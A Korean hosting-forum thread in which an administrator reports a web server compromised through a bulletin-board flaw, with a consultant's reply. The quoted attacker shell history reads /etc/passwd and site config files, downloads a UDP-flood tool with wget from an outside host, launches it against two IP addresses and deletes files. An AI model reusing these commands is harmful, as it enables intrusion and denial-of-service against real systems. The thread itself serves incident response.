해킹당한것 같아요, bindz 와 perl5.8.8 등...

안녕하십니까? 오늘과내일의 홍석범입니다.

제일 먼저 확인해 보셔야 할 것은 피해범위를 확인하는 것입니다.
다행히 root 권한은 빼앗기지 않은듯 하며 웹서버 실행권한인 nobody 또는 www 으로 실행한 것으로 보입니다. 따라서 웹응용 프로그램의 취약성을 이용한 즉 '웹해킹'을 통해 공격한 것이며 거의 대부분은 제로보드의 취약성을 이용한 것이므로 서버내에 제로보드를 사용하는 홈페이지는 없는지 확인후 최신버전으로 업그레이드하시기 바랍니다.

아울러 bindz는 telnet과 같이 원격으로 특정 포트에 접속을 하기 위한 데몬이며
f3는 udp flooding 공격을 위한 Dos 프로그램입니다. 이를 차단하기 위한 방법 역시 본 게시판에서 언급되었으므로 udp flooding 등으로 검색해 보시면 대처하시는 방법을 보실 수 있습니다. 

감사합니다.

임이지 님의 글

안녕하세요? 더운 날씨에 수고가 많으셔요...

다름아니라 원격으로 관리하고 있는 웹서버가 오늘 새벽쯤에 해킹 당한것 같습니다.

사용자가 게시판 보안패치를 소홀히 한 것 같아서 일단 아파치를 내렸습니다.

프로세스 리스트에 perl5.8.8 이 2개 띄워져 있었고 ./bindz 도 띄워져 있었습니다.

해당 프로세스들은 즉각 kill 하였고 죽지않는 고스트프로세스가 하나 살아있는데...

아직 피해상태를 확인하지 못해서 리붓하기가 두렵습니다;;

로그를 보니 계정리스트가 유출된것 같고, root 비밀번호를 유출당한것 같습니다.

다행히 root 비밀번호가 바뀌거나 서버에 심각한 손상을 입지는 않았어요.

재빨리 root비밀번호는 변경하였고, 가능한 원격 접속 방법을 막으려 하고있어요.

www 소유의 /etc/.bash_history 파일의 내용은 아래와 같습니다.

cd /tmp
cat /etc/passwd
cd /home/계정명1
ls
cd public_html
ls
locate config.php
cat /etc/passwd
cd /home/계정명2
ls
cd /home/계정명3
ls
cd public_html
ls
cd /home/wheel계정명4
ls
cd public_html
ls
cat setup.php
6c6c6c6c6c6c6c6c6c6c6c6ccd zen
ls
cd zen
ls
cd admin
ls
cd includes
ls
cd ..
cd ..
ls
cd includes
ls
cat configure.php
pwd
cat /etc/passwd
su
cd /tmp
ls
wget
wget www.parit.org/f3
cmoh 7777 f3
./f3
chmod 777 f3
./f3
./f3 66.152.173.196 1 200
./f3 84.244.8.20 1 2000
rm -fr *&
exit

9000번 포트로 어딘가에 ESTABLISHED 되어있었고 bindz등을 kill 하니 사라졌습니다.

아마도 저 f3를 이용해서 뭔가 보이지 않은 다른 작업을 했겠지요?

저 f3란 것의 정체는 로컬에서 vmware로 돌려봐야 알것 같습니다. (알고싶지도 않지만)

아래는 chkrootkit 체크 결과입니다.

ROOTDIR is `/'
Checking `amd'... not infected
Checking `basename'... not infected
Checking `biff'... not infected
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not infected
Checking `gpm'... not found
Checking `grep'... not infected
Checking `hdparm'... not found
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not infected
Checking `inetdconf'... not infected
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... not tested
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not found
Checking `mail'... not infected
Checking `mingetty'... not found
Checking `netstat'... not infected
Checking `named'... not infected
Checking `passwd'... not infected
Checking `pidof'... not found
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not found
Checking `rpcinfo'... not infected
Checking `rlogind'... not infected
Checking `rshd'... not infected
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... not infected
Checking `syslogd'... not infected
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `tcpdump'... not infected
Checking `top'... not infected
Checking `telnetd'... not infected
Checking `timed'... not infected
Checking `traceroute'... not infected
Checking `vdir'... not found
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... nothing found
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while... nothing found
Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... nothing found
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for OBSD rk v1... nothing found
Searching for LOC rootkit... nothing found
Searching for Romanian rootkit... nothing found
Searching for Suckit rootkit... nothing found
Searching for Volc rootkit... nothing found
Searching for Gold2 rootkit... nothing found
Searching for TC2 Worm default files and dirs... nothing found
Searching for Anonoying rootkit default files and dirs... nothing found
Searching for ZK rootkit default files and dirs... nothing found
Searching for ShKit rootkit default files and dirs... nothing found
Searching for AjaKit rootkit default files and dirs... nothing found
Searching for zaRwT rootkit default files and dirs... nothing found
Searching for Madalin rootkit default files... nothing found
Searching for Fu rootkit default files... nothing found
Searching for ESRK rootkit default files... nothing found
Searching for rootedoor... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'... chkproc: nothing detected
Checking `rexedcs'... not found
Checking `sniffer'... bge0 is not promisc
Checking `w55808'... not infected
Checking `wted'... chkwtmp: nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... chklastlog: nothing deleted
Checking `chkutmp'... chkutmp: nothing deleted

다행히 괜찮아 보이는데, 당장 조치할수있는 대처방법을 좀 알려주세요, 부탁드립니다!

추가 : 댓글에 지적하신 allow_url_fopen = Off 로 수정하였습니다. 이넘이 문제였던것 같기도 하네요...

최근에 php4 를 업데이트 했거든요... 꼼꼼하게 설정을 살펴보지 않고 서비스 시작한 잘못입니다.